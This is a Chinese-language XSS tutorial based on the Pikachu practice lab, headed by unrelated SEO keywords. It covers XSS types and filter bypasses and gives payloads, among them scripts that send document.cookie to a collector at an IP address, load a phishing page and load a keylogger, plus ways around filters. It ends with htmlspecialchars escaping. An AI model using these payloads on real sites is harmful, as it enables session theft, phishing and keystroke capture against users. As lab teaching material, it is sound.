企业网站推广方案范文,如何提高网站点击量,iapp用网站做软件代码,wordpress虚拟币插件XSS全称#xff08;Cross Site Scripting#xff09;跨站脚本攻击,XSS属于客户端攻击#xff0c;受害者最终是用户#xff0c;在网页中嵌入客户端恶意脚本代码#xff0c;最常用javascript语言。#xff08;注意#xff1a;叠成样式表CSS已经被占用所以叫XSS#xff09… XSS全称Cross Site Scripting跨站脚本攻击,XSS属于客户端攻击受害者最终是用户在网页中嵌入客户端恶意脚本代码最常用javascript语言。注意叠成样式表CSS已经被占用所以叫XSS
原因输入没过滤输出没编码。
危害劫持用户cookie钓鱼挂马
分类
1、反射性XSS中危一次性不保存在数据库交互的地方比如带参和输入更新
2、储存型XSS高危长久保存在数据库
3、DOM XSS低危无数据库交互浏览器的dom节点可能存在html文本框URL文本框样式等
操作
在万能闭合‘“后面插入语句scriptprompt(1)/script 或者用弹窗语句‘“scriptalert(1)/script弹出一个对话框1如果能弹窗说明这里是有漏洞的。 示例name变量没有进行过滤 cookie收集展示 设置下点击页面的时候返回地址这样减少用户的疑问也可以把返回的网址换成登录的网页
111scriptdocument.location http://网站IP和端口/pikachu/pkxss/xcookie/cookie.php?cookie document.cookie;/script 配置好返回的界面后输入以下代码提交然后刚才提交的那个电脑的cookie就保存在到pkxss里面了。且用户点击的界面在提交代码之后返回到之前配置的那个index.php上。 盲打获取账户密码
在不确定是否有注入点的地方输入后登录后台可以把登录的账户和密码拿到在md5解密就可以获得账户密码
111scriptdocument.location http://192.168.246.11/pikachu/pkxss/xcookie/cookie.php?cookie document.cookie;/script post方式 钓鱼
script srchttp://192.168.246.11/pikachu/pkxss/xfish/fish.php/script 注意再次点击的时候没有弹出是因为已经保存这个电脑信息需要浏览器清除下cookie 收集键盘信息
同源策略浏览器都约定了“同源策略禁止页面加载或执行与自身来源不同的域的任何脚本既不同域之间不能使用JS进行操作。比如x.com域名下的js不能操作y.com域名下的对象
http:// www. oldboyedu.com :80 / news/index.php 协议 子域名 主域名 端口 资源地址
必须要全部一样才算同源
后台设置好Access-Control-Allow-Origin设置为*既允许所有人访问。 111script srchttp://192.168.246.11/pikachu/pkxss/rkeypress/rk.js/script键盘记录rk.js执行然后在页面任何位置输入就可以键盘输入记录 XSS绕过
前段绕过大小写双写注释编码
1、对前端的限制可以尝试进行抓包重发或者修改前端的HTML。比如修改输入框字符。 2、防止后台对输入的内容进行正则匹配来过滤输入对于这样的过滤可以考虑大小写混合输入的方法。比如sCRipTalert(你吃饭像tuzi)/sCrIPt,利用的是精准过滤换成大小写就绕过了。也可以用其他标签比如框架iframe,类型style标签svg 3、防止后台对输入的内容进行替换采用拼拼凑的输入方法。比如scscriptriptalert(你吃饭像tuzi)/scrscriptipt 4、使用注释来干扰后台对输入内容的识别。比如sc!--test--riptalert(你吃饭像tuzi)/scr!--tshauie--ipt 5:、编码保证输出的情况下后台代码过滤 htmlspecialchars()函数把一些预定义的字符转换为 HTML 实体。
可用的quotestyle类型
ENT_COMPAT - 默认。仅编码双引号
ENT_QUOTES - 编码双引号和单引号
ENT_NOQUOTES - 不编码任何引
预定义的字符是 (和号)成为 amp (双引号)成为 quot ’ (单引号)成为#039 (小于)成为 lt (大于)成为 gt
该函数的语法htmlspecialchars(string,flags,character-set,double_encode) href输出javascript:alert(1111)